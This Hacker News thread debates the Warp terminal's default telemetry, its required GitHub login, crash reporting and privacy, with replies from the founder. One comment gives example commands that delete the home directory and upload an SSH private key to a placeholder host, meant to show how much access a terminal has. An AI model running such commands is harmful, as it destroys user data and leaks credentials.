Honestly, this freaks me out. It’s an angle I’ve never considered before. Now I need to make sure my current terminal emulator (kitty) isn’t sending information to the internet without my permission.


Agree, this is a pretty bad deal breaker for me. Big business people doing short-sighted big business things, salivating at cramming a product full of telemetry. All without transparency around it? In a terminal of all things?? Indescribably off-putting and catastrophically damages my trust in the product and the CEO.

EDIT: To be fair there is some transparency in the original post. I was looking through the landing page for it (where it is not mentioned). Also, imho it should still be opt-in even for beta. Not everyone is going to read the wall of text to parse out the buried note on telemetry


This is why I deleted Fig (https://fig.io/) right after installing it. It must've sent some uninstall information, too, because the creator/CEO emailed asking why I uninstalled it afterwards...


Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.

Their getting started instructions [0] are all just terminal commands too, and even that doesn't mention Mac once.

[0] - https://fig.io/docs/getting-started


> Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.

Not that it isn't annoying (it is), but that's pretty common with Mac-only software in my experience.


It's even more common with windows-only software.


Every single tool in the console homebrew space, I swear. And it's not like the code isn't portable, it's usually just some command-line / batch thing; but they just don't bother to compile it for anything other than Windows; and then they don't release it as OSS for you to do so, either. The number of things I've had to run under WINE...


Hmm, I use Mac and Windows heavily and haven't found that to be the case nearly as much on Win10/11.

On the rare occasion something truly is Windows-only, it's usually made far clearer than with macOS-only software.


"Send Download link" is a huge red flag. The only reason to have such a button is to send spam.


Yikes. No thanks.


lmao the same happened to me


Hi - as the poster and founder I again completely get the concern.

We should make it even more transparent what we collect. You can see it here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel...

Re: big business, we're still pretty small, but it's true that we are trying to build a business around the command line. I get that that's controversial, that it's not something that exists today, and that the terminal is a super-sensitive, low-level tool.

We will never ever build a business around terminal data, and to be super explicit, we are 100% not collecting any command inputs or outputs.

The business that we want to build is around making a terminal (or a platform for text based apps) that grows because it makes individuals and teams a lot more productive on the command line.

If there's one thing I've taken away from this Show HN so far, it's that there is a lot of well-founded concern about the terminal and user data, and that we need to do a better job on this issue.


Hey Zach, while I think your post is well-intentioned, the contemporary default level of trust around tech companies and data privacy is just very low. As a new entrant to the field, you inherit the default valuation—people have no other info to go off of.

Given that, it's probably the case that the only options are to either be fully open source or to make a fully offline mode an option.

In any case, I think the concept for your product is excellent—it's been mind-boggling to me that something along these lines wasn't tackled years ago, so I look forward to your guys' future success, hopefully moving the state of terminal interaction into the modern era.


> ...the contemporary default level of trust around tech companies and data privacy is just very low...

It's not just that the level of trust is very low. I shouldn't need to place any trust in the developers of my terminal at all. If I can't know for a fact that it's not acting against my interests, then I'll pass. I already have such a big selection of fully open-source terminals available. Why would I even consider taking any kind of risk with this one?


I can’t speak for you, but generally people at least consider this tradeoff because of the additional utility of the third party tool. Ideally all these features would exist in the system terminal, but that hasn’t happened, and it possibly won’t ever.


As much as I can appreciate the community’s reaction to your approach of default collection of telemetry, I can also equally appreciate you and the rest of the team sucking it up and accepting the feedback. Thanks for that, and I’m personally interested to see where you’re able to take Warp. I think there’s something potentially pretty compelling here.

My advice here would be to simply make telemetry opt-in during the beta period. I’m typically pretty liberal about opting in to telemetry (particularly when the extent of it is documented), but obviously a lot of your users will not be. Your desire to accelerate your progress seems to conflict with the needs of your target demo, and I think this warrants adjustment.


If the code is there, it is potentially exploitable, so opt-out is nowhere near good enough. If it can send to remote hosts, this can be abused. This capability should not be there at all.

Look at the recent logging fiasco for an example.


> If it can send to remote hosts, this can be abused.

A useful terminal cannot be prevented from contacting remote hosts.


You may be conflating programs running in a terminal and the terminal itself. We've managed to get this far without the latter.


I am not conflating the two. If the terminal can run programs connected to the internet, then the terminal has internet connectivity. The host system would not be able to tell the difference.

Warp could certainly promise not to include any phone-home functionality in their code, but unless it's open-source and everything is audited, it could easily call the host system's HTTP client and still phone home.


> If the terminal can run programs connected to the internet, then the terminal has internet connectivity.

Is this true? This sounds wrong to me, but I don't know the inner workings of terminals. The terminal just executes programs and handles pipes, it seems. A terminal can be completely walled off from the internet, and when you execute something from it, say, curl, then curl has its own memory space and access layer outside the terminal, and just has its stdio wired to the terminal.


> The terminal just executes programs and handles pipes, it seems. A terminal can be completely walled off from the internet, and when you execute something from it, say, curl, then curl has its own memory space and access layer outside the terminal, and just has its stdio wired to the terminal.

As I said in my comment, even if you "wall" the terminal off from the internet, if it can make system calls on behalf of the user, it can still access the internet.

If a terminal has sufficient access to the host system to call `curl https://www.google.com` on behalf of the user, then it can call it without any user input.

There is nothing on the host machine that can authenticate system calls coming from the terminal application as "user-initiated" or not. This is similar to the warning that "you can't trust the client"[1].

1. https://security.stackexchange.com/questions/105389/dont-tru...


You're technically correct here due to some sloppy wording, but this isn't the point that everyone here is trying to make. We know our terminals can connect to the internet; we don't want them to do that without being instructed to. If our terminals randomly curl'd websites (as opposed to delivering telemetry to a third party), I'm sure the discussion would be similarly displeased.


And what I'm saying is that there's no way to set a terminal's permissions on the host system such that it can access the internet on behalf of the user but cannot access the internet on behalf of its creators.

This is a human problem, not a software one. Your terminal is as trustworthy as its creators. It cannot be locked down to prevent telemetry and still be a useful terminal. That was my original point and it is still true.

No one should use a for-profit terminal emulator, especially one created by a VC-backed startup, full stop.


or

they actually listen to our feedback, remove forced telemetry, and remove sign-in in the next release; then I'd be happy to give their product another chance

although no guarantee they'll not turn evil at some point in the future...


Profit motive means that even if they do that now, they're incentivized to collect data in the future. From the standpoint of investors, leaving that revenue stream on the table would be dumb, considering every other company in tech spaces draws revenue from collecting their customers' data.

If a company is committed to never spying, then they'd have no problem making such terms contractually binding on their end. Companies that say they're against spying, but leave the option to collect their users' data open for the future, aren't really committed to not spying.


If they start out evil, then don't expect them to change.


Wanting to collect usage information and errors isn't evil-by-default. It's incomparably useful for troubleshooting and improving. Absolutely nothing works better, it's the best by a ridiculously large margin.

But yeah, terminals are very sensitive environments, opt-in should be a default even at launch.


> Absolutely nothing works better, it's the best by a ridiculously large margin.

Is this really the case? It seems that to find mistakes in software for various interaction patterns, truly exhaustive automated tests would likely work far better by various measures (coverage, reliability, reproducibility, reusability etc.) and at the same time do not have the extreme downside of privacy invasion. For example, see a section from the Age of Empires Post Mortem https://www.gamedeveloper.com/pc/the-game-developer-archives... :

"8. We didn’t take enough advantage of automated testing. In the final weeks of development, we set up the game to automatically play up to eight computers against each other. Additionally, a second computer containing the development platform and debugger could monitor each computer that took part. These games, while randomly generated, were logged so that if anything happened, we could reproduce the exact game over and over until we isolated the problem. The games themselves were allowed to run at an accelerated speed and were left running overnight. This was a great success and helped us in isolating very hard to reproduce problems. Our failure was in not doing this earlier in development; it could have saved us a great deal of time and effort. All of our future production plans now include automated testing from Day One."


Automated tests are completely useless for finding (let alone solving) human interaction issues. To compare them with telemetry is a category error.


Shouldn't human interaction errors be left up to the user to report, as opposed to software sending sensitive information to a third-party?


I have no data on this, but instinctively it seems that, given alternatives, most people abandon buggy software rather than patiently reporting problems and waiting for it to get better.


Yeah. User reporting has a very obvious and very strong survivorship bias. Plus the people who take the time to send in a report are a rather small niche, so you have pretty strong bias even if you exclude people who leave.

Always-on metrics are massively higher quality data. They don't collect the same kind of data in many cases, but they can reveal a lot of things that never get reported. They also don't suffer from the well-established pattern of people not accurately reporting their own behavior when asked / polled (stronger when asking about future behavior, but it applies in all cases).


In production, agreed. In beta, I’ll accept it. I feel that the term beta gets abused a lot, but in what I believe is its proper meaning, there are a lot of inherent factors both parties are agreeing to: increased risk of error and data loss, and debugging flags that generate more data for the singular purpose of improving the product. That’s exactly what should be in the privacy policy and explicitly stated upon install. Anything short of that puts me firmly in the hell-no category with you.


With you here on this. Telemetry is a really important concern and I get why people don't like it, but fundamentally the expectations for a beta product surely have to be different. The thing is still in development.


I'm with you on not sending data, but have you ever read user reports? If you get any (most users won't report), they likely won't have enough information to reproduce or fix the problem.

Automated error reporting does have its uses.


It is evil by default. Paying beta testers, or giving them a free, opt-in version with telemetry is the ethical route. Being ridiculously, over the top clear about exactly what you snarf off the end user is the ethical route.

You are not entitled to access my machine, and that shouldn't be casually dismissed with "don't worry, we're not doing anything bad." You're creating potential vulnerabilities, and by implementing identifiable patterns, reducing the security of your users.

You shouldn't spy on people, and when you do, it's wrong. Remotely inspecting people's behavior is spying.

Your software doesn't need to phone home. It doesn't need automatic updates. You don't need to spy on people to develop good software. That's toxic nonsense.


In my view, ethical telemetry really should:

- be opt-in

- provide an easy to read & access log which can be reviewed by the user at any point

- never collect unnecessary information 'just because' it might be useful in the future

- should provide a very good detailed analysis of any claims to anonymity

If something doesn't even fulfil the first criterion, it's probably violating all the others too.


Telemetry is just the cheapest and most convenient option for business owners, and not necessarily the best option when it comes to improving customer value and experiences.

Case studies, focus groups, surveys and interviews are great ways to determine usage patterns and problems with products and services. Of course, you'd need to pay users to participate in them, and then you need to pay expensive employees to conduct, collect and analyze the results. Spying is cheaper than doing any of that.


I appreciate the balanced, reasonable discussion.

I agree both that telemetry is useful and that there's not necessarily a place for it in the tool I use to manage my workstation and hundreds of servers. Perhaps I'd opt in to a middle ground, that is collect telemetry locally into a support file I can review, evaluate, and potentially redact before submission.


> Absolutely nothing works better, it's the best by a ridiculously large margin.

Then why is the telemetry-encrusted modern Windows a usability fail, even compared to past versions of Windows which relied on extensive in-house user testing?


Because telemetry is used to maximize profit and not to maximize value for users.


Because power users turn off telemetry where they can which means they only see telemetry from "normal users".

That's my theory anyway.


You can’t turn telemetry off in Windows. Your choices are “full telemetry” and “less telemetry”.


Having data available doesn't mean using it to do anything useful.

As evidence of this, I offer: the vast majority of all human behavior over literally all time.


Usually the practice in these scenarios is to try out all possible ways to make money, then walk back a little once the public outcry is big enough. At some point you find the most profitable balance, just before you've driven away all your customers.


There is a plethora of free GPU-accelerated terminals. Alacritty, kitty, foot, wezterm, etc. None of these as far as I know send telemetry data. I see no reason to think that a new terminal is going to make money somehow by finding a balance.


My comparison was about the business models of these "evil" cases in general, not about terminals in particular. In general, free apps tend to need to find a balance between how much "exploitation" users will tolerate and how much they get from the app, if the app maker wants to make some money.

I personally don't see any reason to swap my terminal for one with telemetry. One of my worst fears is that some day I'll be forced to.


> remove forced telemetry, remove sign-in in the next release

Then why would anybody bother to invest in their next series?


because they have a growing number of paying customers.


They have a complete telemetry section on their website, which also states that no input or output data is collected.


The problem with telemetry data is that sometimes you can accidentally collect sensitive data without realising it. I know of one library on iOS that was collecting the coordinates of all touch events. However, that meant it was collecting the coordinates of all touches on the keyboard, which made it possible to reconstruct user input into password fields.


You’re right about there being a problem with it.

Which library was/is doing this? Would like to avoid it.


Which is worth nothing if it can't be examined and verified (not to mention it can change with any release).


As the author of the post (and founder of the company), I think this is also a very reasonable concern. It's one that we have as well and that we take very seriously.

Our stance here is that:

1) We are very explicit about what gets sent (only telemetry and crash reporting) and you can see the full list of telemetry events here (https://docs.warp.dev/getting-started/privacy#exhaustive-tel...)

2) For collaborative features like block-sharing (e.g. https://app.warp.dev/block/tbxmeAKsj657aHkPdHpmoY) it's completely opt-in

However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception. I stand by that but get that it's a paradigm shift.

Please keep the feedback coming though - it's helpful to understand how you think about it.


> However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception.

But that’s exactly it. A lot of people on here, including me, do not agree that _every_ app has that potential. In fact many believe that internet connected apps are unnecessary for many things. There is strong evidence against this if you just look at the number of “secure” systems that have been hacked over the decades. While you may capture a large audience with your internet-first terminal “app”, who honestly don’t care about this stuff while at work, you will get pushback from HN and somewhat+ privacy concerned devs.


Then maybe Warp is not the right terminal for you? It is ok if other people like Warp for what it is.

Here's another rust based terminal you can check out: https://github.com/alacritty/alacritty


As a user, I can see the potential, sure. But it's not realized in any way. Right now this terminal uses Internet only for collecting my data (GitHub account, telemetry, and more).

The value proposition is negative. A paradigm shift, sure, but IMO in wrong direction.


This was my first concern as well. I don't want my terminal to be a startup.


> I expect my terminal to be a much more secure environment than my web browser.

Wat? Your terminal is 1000x less secure than your browser. Your terminal can do `rm -rf ~/`. Your terminal can run `curl -F 'data=@~/.ssh/id.rsa' https://bad.com`. And those are just 2 of 1000s.

JS on your browser can do none of those.

Maybe you meant to say you want apps running from the terminal not to phone home, but nothing in the terminal prevents that.


That's security vs. safety. You're pointing out that a terminal allows the user to perform actions that could be unsafe. Such actions, or JS in the browser, become a security risk when they can be performed without the user's awareness or consent.


Nonsense. The terminal is a place where you run software. Every piece of software you run in the terminal can do all kinds of nasty things to your system and steal info.

The browser is also a place to run software. There, that software cannot do anything to your system, nor can it steal any data.


> Your terminal can do `rm -rf ~/`. your terminal can run `curl -F 'data=@~/.ssh/id.rsa' https://bad.com` and that just 2 of 1000s.

You'll be warned if you do the first, and plenty of people are phished via browsers.


>You'll be warned if you do the first.

I don't think so. I dare you to run it.


I'm not sure I'm ready to have SaaS models replace core utilities and tools locally.

> Announcing Warp’s Series A: $17M to build a better terminal

And just thinking about this... it's not clear to me what their moat will be, as I suspect that if there's a really compelling feature, it will be available in OSS terminals quite quickly. Perhaps it's the product polish? But I'm not sure polish is what I want from a terminal; at least, it's not the top thing I want.


I wondered the same. Then I realized it sends out requests to googleapis, segment, and sentry. Imagine having data on every dev's terminal workflow? Ca$h.


Sounds more like a good way to get your product banned from a lot of workplaces.


A lot of workplaces don't even bother to ban grammarly, which is literally a keylogger*, this won't even be on their radar.

* I feel compelled to point out that Grammarly disagree with this definition because it doesn't send every single keystroke, just the ones in non-password text boxes.


Is grammarly not correct here?


If my plugin Passwordly, only sends the keystrokes inside password boxes, is or isn't that a key logger? It's only capturing a subset of your input, like Grammarly, so not a keylogger?

If the argument is, it's not a keylogger because it's not logging sensitive information, well I type plenty of sensitive information into non-password textboxes.


I’d say passwordly also isn’t a key logger. By your definition every text editor would be a key logger. That may be the strict definition of a key logger but the commonly accepted meaning is different. A keylogger logs all keys regardless of the app being used or general use case. Often they are malicious as well but that doesn’t have to be the case.


I doubt their compelling features will be in OSS terminals any time soon. I’ve wanted a terminal that has a decent multi line editor for years, and there’s nothing out there.


Vim supports multiline editing and I'd imagine emacs does as well. In bash/zsh, <ctrl-x ctrl-e> opens up $EDITOR so you can use whatever you're accustomed to anyhow.

Most of these features are already available if one spends a bit of time configuring their terminal/shell.


Is multiline editing popular/useful? Thus far, the only occasions I've seen it shown is when someone is demonstrating it.


I use the visual-multi plugin [0] all day in vim/neovim.

I don't like using tons of plugins but multi cursor with with selective invocation like the ctrl-d of sublime etc was the main thing I missed when moving to vim. (I use visual block mode too but it's not the same thing).

https://github.com/mg979/vim-visual-multi.git


I'd say so, I find myself using it somewhat regularly.

It's pretty easy in vim once you learn how to use visual block mode. That or using Sed to replace text in a selection or the entire file.

http://paulrougieux.github.io/vim.html#Edit_multiple_lines


They are very useful! As a long time Vim user who switched to Kakoune[0] a while back, I didn't even realize I needed a good multiline cursor from my editor before it tried Kakoune. Highly recommend it!

[0] https://kakoune.org/


If you need to pass lots of arguments to a command it's super useful. Typically I don't do this because it's quite unwieldly with a standard readline editor, but I could if multiline editing was available!


Put `set -o vi` in your .bashrc

That's all you need - you don't need a whole program that collects all of your information.


I use it not infrequently for crafting big ol bash pipelines to put into scripts, specifically via emacs’ `shell` terminal emulator.


Thank you for sharing this tip ^_^


While this can be done in zsh/bash, it takes investment to understand how to use multiline specifically. And then once you leave the terminal, the same keystroke does not do anything for you.

One of Warp is that you don't have to think twice about it because it behaves similarly to text fields everywhere else on your computer.

In the terminal, I often have the feeling that personal computing revolution from Xerox PARC & Apple Computer never happened.


This works in everything that uses libreadline to accept user input (unless the binary has specifically configured library differently iiuc), so should work in all shell-like interfaces. You can customize the shortcuts in inputrc, likewise, for all libreadline-using binaries. By default, readline tries to be emacs-like. You can ask it to be vi-like, or reconfigure lots of its shortcuts to be similar to an editor you like. To be fair, "escape to real editor" is not a thing you usually do in an editor, so that will remain special.


This stuff has been in the major shells for years, through excellent editor integration. For emacs and vi it's pretty much free. If you want to integrate with a different editor, it's totally doable.

Most of the stuff sibling comment is referring to center around the feature:

'edit-and-execute-command' in bash. There is a similar incantation for zsh.

I summon it with, 'ESC v' in both.


If I open an editor then my scrollback history isn't visible (or is in a separate window). Maybe vim and emacs offer this, but that's a big commitment just for a terminal. Warp has GUI-grade editing (mouse support, etc) with things like multiple cursors in a very nice interface.


Ctrl-z will put Vim to sleep. You can look at the history and then type `fg` to bring the Vim back to the foreground.


In emacs a shell is like a text buffer where you can simply search or move around as you would do in a text file. To get command history you'd just execute `history` and then ctrl+s (find) it, or move to it with the cursor.


So does Emacs. I kind of assume vim and neovim do too, these days.


Normally I would pull the command I need multi-line editing for back from shell history, using the search operator '!' and print predicate ':p' before invoking bash's 'edit-and-execute-command' on it. I suppose while in the editor then I might need history again, but I can't recall it being an issue.


Three words for 2 tests regarding these features:

1. discoverability

2. wide spread use.

Bash and zsh fail both tests.


I love how my previous comment is downvoted with no answer by I assume bash and zsh fanboys when these kinds of features are barely used by users, because they can't be easily found.

Use something like fish to see what real feature discoverability for a shell looks like.

And I say this as a zsh user that has waded through the mountains of obscure documentation to set it up. Don't fall into Stockholm syndrome and think that if you went through hardship, others should, too.

99% of bash/zsh discussion threads are someone going: "here is awesome feature I found" (where frequently that feature is something that should have been painfully obvious to notice) and then 100 replies: "that's so cool and useful, I never knew about it and I've been using bash/zsh for N > 5 years".


I have no idea who downvoted you or why they did so. I'm seeing your reply for the first time. From what I can see, our priorities in our tools are different. Discoverability and widespread use of particular features are not near the top of my list. I have read the bash manual. For the tools I use most, I've found it to be a good investment, that has paid me great dividends.


> a terminal that has a decent multi line editor for years

You can use ctrl-x ctrl-e in most terminals.

https://unix.stackexchange.com/questions/85391/where-is-the-...


>You can use ctrl-x ctrl-e in most terminals.

Shells, not terminals.


In Bash:

    C-x C-e
This opens $EDITOR, and when you finish editing and close it, it runs the code.


haha well "decent" is in the eye of the beholder, I'd argue that vim is not only "decent" but by far the best general purpose IDE available.


> I’ve wanted a terminal that has a decent multi line editor for years, and there’s nothing out there.

You can go the other direction.

Install neovim. Run `:terminal`. optionally run `:help Terminal-mode` first so you can figure out how to get out.


Doesn't `set -o vi` do this for you? Place it in .bashrc and you're good to go.

It's great to use this with awesomewm for windows management, and vimium for browser control. Then you can develop in vim, bash in vim, browse in vim, and switch windows with vim. You don't have to learn 10 different, unintuitive, and ridiculous hotkeys for each different program or level.


I use pretty out of the box zsh with vi-mode and it... just works for multiline editing? I can simply move down and up with j/k...


It depends how you define multiline but check out: https://github.com/jart/bestline


Multiline works out of box in fish shell. I'm not sure how terminal is relevant here.


Terminals are largely owned by graybeard maintainers that aren’t interested in innovating the Unix command line. This is not a difficult change.


> I'm not sure I'm ready to have SaaS models replace core utilities and tools locally.

This isn't something you can ever be ready for. It's so completely and obviously wrong. Just say no.


The moat would be if teams depend on it for sharing workflows. Doing "teams" right on OSS is tricky, much easier to pull off in SaaS.


Warp engineer here.

FWIW, the Warp terminal will be free for individuals. We would never charge for anything a terminal currently does. So no paywalls around SSH or anything like that. The types of features we could eventually charge for are team features.

Our bet is that the moat is going to be the team features, like:

- Sharing hard-to-remember workflows

- Wikis and READMEs that run directly in the terminal

- Session sharing for joint debugging

Our bet is their companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.


> The types of features we could eventually charge for are team features.

You can probably maximize community acceptance if you provide clients that do not use these features as actual FOSS and only start incorporating closed-source pieces for those features. With things like client keys etc to restrict server access.

A bit like the Chrome/Chromium thing was intended initially.


> - Sharing hard-to-remember workflows

Those get codified into ansible and deployed on CI/CD pipelines. This is an anti-feature. The day that someone suggests using a terminal to manage hard-to-remember workflows is the day I start a huge crusade to fix whatever process led to introducing yet another tool.


> - Sharing hard-to-remember workflows = Make better scripts and put in CI

> - Wikis and READMEs that run directly in the terminal No thank you

> - Session sharing for joint debugging = That's more for development.. not for shell access

> Our bet is their companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.

I actually don't want them. I migrated from many apps that do too much to apps that do one thing really well.


What would be the advantage over version controlled shell scripts?


(Not affiliated with Warp but care about this particular thing)

Shell scripts implies, well, a particular shell. If everyone is on similar OSes, maybe that works for you, but as a Windows user, "pile of bash scripts" might as well be "doesn't work for you." I use a terminal for my daily work, but don't have bash installed on my machine.

That said, I haven't tried Warp yet specifically because it's Mac-only right now. Even within that context, Warp integrates with Bash, Zsh, or Fish, which do have their own extensions to POSIX shell, but at least you can rely on Bash being installed.


That would also now force everyone to use this proprietary product instead of whatever they're familiar with.

For mac <-> linux, posix-compliant scripts mostly work in my experience but you have to account for different versions of gnu utils. For linux <-> windows, if it's small you could just write a powershell script, or use something like python on both, no?

I fail to see how these features are nice enough to force people to use a proprietary terminal that, for now, is compatible with existing bash/zsh shells.


Yes, that is true, but it does seem like that's what their strategy is. If you're using these collaboration tools at your job, you'd have to be using the product already. So that's less of a problem than it would be for say, scripts included with some sort of open source project.

My point is mostly that shell isn't cross-platform, and this is one way you could address that. But it's not a generalized solution, absolutely.

(and yeah, something like Python is better than trying to keep multiple of the same scripts in different languages, for sure. You can do it if you wanted though, if they're small and you're willing to commit to it, I'm not sure I've ever seen it really pulled off.)


>shell isn't cross-platform

basically every operating system has a posix shell by default except windows, but it has been ported there multiple times, samba existed for decades and WSL is on the rise. It may sound a little more irritating but they deserve it for still running windows :p /hj (besides you can just host an ssh server)


I mean, I could also tell you "Just download and run PowerShell, it's ported to Linux", but you also know that would make you feel like a second-class citizen, because you know it's not something as good as something that actually works on your platform in a real sense.


Nix(OS) already solves this problem.


I cannot use Nix on my platform, and I’m not changing OSes.


Which platform do you use?


Why would it be easier to port Warp to a new system compared to Bash, Python, Perl, etc.? These tools are widely used to automate workflows and are already ported to any system you would probably care to develop on.


You aren't the one porting Warp, but you are the one porting the shell script.


So programs/workflows written in Warp will be portable without much effort, in some way that an equivalent shell or python script isn't? Why do you think that?


It seems like you’re grouping a bunch of things together and saying I have opinions about them that I don’t. Let’s break them out:

workflows I would assume to be portable, yes. It is an assumption. I generally expect program configuration to be mostly cross platform by default.

I’m not sure what a program written for a particular terminal would be, so I’m not sure if I’d assume portability or not.

Shells are not ubiquitous, even if they are available across platforms technically.

Python is truly cross platform and largely ubiquitous.


Ok, maybe I misunderstand what a "workflow" is. Since we are talking about replacing shell scripts with "workflows", I assumed that they are a kind of programming facility of about similar power as shell scripts. But that may be incorrect.

> You aren't the one porting Warp, but you are the one porting the shell script.

It sounds like your are saying somthing like "Warp scripts/workflows require almost no effort to port, compared to the shell scripts they replace". I was interested to learn how this can be the case. Perhaps my interpretation was wrong.


I may also be too; like I said, I haven't used Warp yet. Just read their docs. "Workflows" are described in their docs as effectively 'aliases with better docs that integrate with a search bar', and are defined in a YAML file. They don't actually show said YAML file, so I don't know how complex they are. If they give you the full power of the underlying shell, then yeah, you're back at the exact same problem, but if it's stuff like "invoke this program with this set of arguments," which is what their examples seem like, then I'd expect it to work with any shell as long as that program is installed.

> Perhaps my interpretation was wrong.

And perhaps mine is. The docs aren't in-depth and I don't own a Mac. But really, ultimately, "are workflows more portable" isn't a question I personally am wed to; it's that "shell scripts are only portable via UNIXes and there's a much bigger world out there" that I am, and I am hoping that workflows are more portable than shell scripts. In practice, they may be, or they may not be, but since they're in a layer above the shell, it's possible that they're not shell-specific.


Thats a good question. In the end Warp programs/scripts will be written in just yet another interpreted language.


That's a great question! Version controlled shell scripts are very useful (and in fact workflows in Warp can also be version controlled) but they still have a few problems: 1) Documentation--when a repo has a lot of shell scripts, it can be very difficult to know which command to run in certain situations. Even if each shell script has documentation, there's no way to find that documentation natively from the terminal itself. 2) Searching--you can only execute commands from the terminal based on the shell script name but there's no easy way to search for a script based on _what_ it does or any other metadata.


> - Wikis and READMEs that run directly in the terminal

Nushell can open READMEs natively and can admittedly work with Wikis through a plugin.


$3.99/mo for the Pro plan let's you run as many concurrent processes as you want!


It's just.. an incredibly bad look to have this be the top comment on a post about this while the website claims that "cloud stuff" is opt-in.

It's more essential to be honest about this during the beta period than after, so "oh it will be opt in" is a cold comfort, alongside the approximately never-true "we'll open source it some day."

Not touching this with a ten foot pole. Not for something as essential to my day to day work as a terminal.


Further down in the thread, they claim that Warp is nearly as fast as Alacritty. Then a user points out that it isn't even close and their response is basically, yeah, we know that. We want to fix it.

How does a company expect lying on HN to work out well for them? I'm sure they're doing their best, and are excited about their launch. But they are coming off as so shady because they're trying to fool people.


If they really wanted to be open source but don't accept contributions at the time, setting up a read only minor with a proper FOSS license will be a good way to do that.


We tried to be really upfront in the privacy policy:

https://www.warp.dev/privacy

Opt-in refers to anything that sends any contents of a terminal session to our servers (as opposed to telemetry which is metadata and never contains any terminal input or output). But we hear the feedback and appreciate it.


At issue here is your front page, which says:

"Private & Secure: All cloud features are opt-in. Data is encrypted at rest."

While you might have some wiggle room to say that telemetry is not a "cloud feature", logging in with github is absolutely a cloud thing and it's not really opt-in if you can't use the software without literally identifying yourself to a cloud service.

You should at the very least remove that text from your front page until you're out of beta and it's actually true.

And that's ignoring the fact that there's no victory in splitting hairs over the definition of cloud stuff to pretend you're not walking a very fine line.


Zach, this telemetry approach is fine for Google Docs retail users but Warp's target customers are some of the tech savviest people on the planet. They are going to hold Warp to much higher standards of security and privacy.

Second, your user onboarding has too much friction with mandatory Github logins. You need an advisor / product manager who can guide you better when making these "human" decisions.


Yikes!

Because you posted directly to HN and clearly want to show this audience the value of your work, I expected a somewhat different reply to this critique.

A more user-centered reply might have been to say you understand the confusion and will look into making this truly opt-in with the team. I think the strong message you're getting from this community—who is, after all, your target audience—is that before sending any data (whether you choose to label it telemetry, tracking, diagnostic data, or otherwise), you should explicitly ask in the terminal itself whether the user finds this acceptable.

I don't want to put down an effort with seemingly good intentions like this one, so please take this engagement in the spirit it was given.


That doesn't fit people's normal expectations. You're being intentionally deceptive.


> Opt-in refers to anything that sends any contents of a terminal session to our servers

There shouldn’t even be the option to opt-in to something so privacy violating.

Having built-in sending of session content means dangerous data exfiltration is always just one bug or accidental click away.


I was confused by your wording, but I think this section of the link is very relevant:

>When Warp comes out of beta, telemetry will be opt-in and anonymous.

>But for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.


I highly doubt anyone reads that. I think the only way to be up-front about it is to have an annoying pop-up that with a button that says "OK YOU CAN SEND TELEMETRY" that must be clicked before proceeding.

To be fair, I think HN is a collection of outliers when it comes to caring about network activity caused by running programs. Most devs will probably just be happy that the tool provides a lot of value.


Wrong crowd for this approach, I think.


If you really wanted to be open source but don't accept contributions at the time, setting up a read only minor with a proper FOSS license will be a good way to do that.


Do you believe your policy is GDPR compliant?


No way this is GDPR compliant. A mandatory Github login sends data to US servers. Even with the normal additional standard contract clauses it is at least disputed, if this holds any grounds in a CJEU trial.

Twilio, the owner of Segment.io is also a US company and will receive individual-related telemetry data, which should break with GDPR.


As the author of the post, I think this is totally reasonable feedback and something we have discussed quite a bit on the team.

The general stance on telemetry that we have is that a) we are just starting and it's really helpful to see which of our product ideas are useful to our users (e.g. does anyone use AI Command Search? Should we continue to invest in it) b) we tried to be very explicit about what we are and are not sending - it is only metadata and never command input or output (you can see the full list of events we track here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel... c) if you aren't comfortable with telemetry, then please don't use the product just yet - we will make telemetry opt-in when we have a large enough sample size that we can be confident extrapolating what's going on

For googleapis - this is for login. We use firebase as our auth provider.

For segment - this is for temeletry, as you point out.

For sentry - this is for crash reporting.

As for why we have accounts, it's because we are starting to add features for teams and it's important in that context that there is some type of identity associated with the user.

But like I said at the start - the feedback is totally reasonable and we are trying to figure out how to balance concerns here while still being in a good place to iterate on and improve the product.


As a Sentry user (for a web app where people are not placing sensitive IP!) - it is INCREDIBLY easy for it to be configured to suck up massive amounts of PII and sensitive IP in the context of its crash reports. If I am running `kubectl create secret --from-literal` and something crashes, can you guarantee that the contents of that command will not be loaded into Sentry? Breaching this guarantee would be as simple as having some code somewhere in your stack (including a parsing library) format an Error with the command contents, miles away from anything Sentry-specific.

I'd be much more trustful of your product (and indeed, I do desperately need a better terminal!) if you were to:

- make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND

- clarify in your event telemetry documentation, and explicitly in your Privacy Policy, that ONLY the event ID/name, timing, and the user ID are sent to Segment, nothing else.

But I simply cannot use a terminal where my keystrokes might be logged to anyone's Sentry or Segment account - even if it were our company's own Sentry account. The risk of partner-entrusted credential leakage into an insecure environment is simply too high.


> - make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND

100% this. I don't entirely understand why Warp needs to connect to Sentry right at application launch. If it crashes, capture that crash and present me an opportunity to report it or not. If I do agree to report it, first present me the complete text of everything that will be reported.

I understand that this puts some hurdles in the way of getting crash reports. But terminals frequently contain information far too sensitive to trust with these things being automated.


Is this answer minimizing a bit?

You can use the Firebase login tools without the person identification stuff pulled in. Note that for companies failing to do this in a privacy respecting way, a savvy user can usually get granular at the firewall and get the login to work without the audience reporting. Which means you could…

Similarly, in my book, segment.io isn’t just “telemetry” so much as it’s killer feature of cross app audience persona correlation, so less about what’s up with the app, more trying to learn more about the users without asking them. If you were instrumenting the app UX and not trying to see who is using you, there are other choices.

A number of ways to do accounts that can leverage a person’s own IdP or other approaches where you don’t have to have accounts, e.g. most any channel the team or group can access will do to get in sync on a session start.

Regardless, and even if GitHub and e.g GitHub Orgs are your way, all of them should be optional since not everyone is desperate to team their cli.

Last, and sorry to put it like this, if you’ve “discussed it quite a bit” as a team, I’m not sure but maybe that gives me less confidence in your respect for security, privacy, and users.

